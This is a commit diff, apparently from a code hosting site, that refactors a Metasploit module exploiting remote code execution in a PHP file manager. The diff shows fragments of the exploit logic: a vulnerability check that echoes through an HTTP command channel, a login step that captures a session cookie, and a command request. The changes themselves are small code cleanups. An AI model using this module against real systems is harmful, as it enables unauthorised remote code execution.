Update phpfilemanager_rce.rb
parent
28ca899914
commit
3bbc413935
|
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
txt = Rex::Text.rand_text_alpha(8)
|
txt = Rex::Text.rand_text_alpha(8)
|
||||||
res = http_send_command("echo #{txt}")
|
res = http_send_command("echo #{txt}")
|
||||||
|
|
||||||
if res and res.body =~ /#{txt}/
|
if res && res.body =~ /#{txt}/
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
else
|
else
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
|
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def push
|
def push
|
||||||
uri = normalize_uri(target_uri.path.to_s)
|
uri = normalize_uri(target_uri.path)
|
||||||
|
|
||||||
# To push the Enter button
|
# To push the Enter button
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
|
@ -83,15 +83,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
fail_with(Failure::Unknown, "Failed to trigger the Enter button")
|
fail_with(Failure::Unknown, "Failed to trigger the Enter button")
|
||||||
end
|
end
|
||||||
|
|
||||||
location = res.headers['Location']
|
if res && res.headers && res.code == 302
|
||||||
|
|
||||||
if res && res.headers && res.code == 302 && location =~ /index.php/
|
|
||||||
print_good("#{peer} - Logged in to the file manager")
|
print_good("#{peer} - Logged in to the file manager")
|
||||||
cookie = res.get_cookies
|
cookie = res.get_cookies
|
||||||
cookie
|
cookie
|
||||||
else
|
else
|
||||||
fail_with(Failure::Unknown, "#{peer} - Error entering the file manager")
|
fail_with(Failure::Unknown, "#{peer} - Error entering the file manager")
|
||||||
return
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -99,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
cookie = push()
|
cookie = push()
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => normalize_uri(target_uri.path.to_s),
|
'uri' => normalize_uri(target_uri.path),
|
||||||
'cookie' => cookie,
|
'cookie' => cookie,
|
||||||
'vars_get' => {
|
'vars_get' => {
|
||||||
'action' => '6',
|
'action' => '6',
|
||||||
|
|
Loading…
Reference in New Issue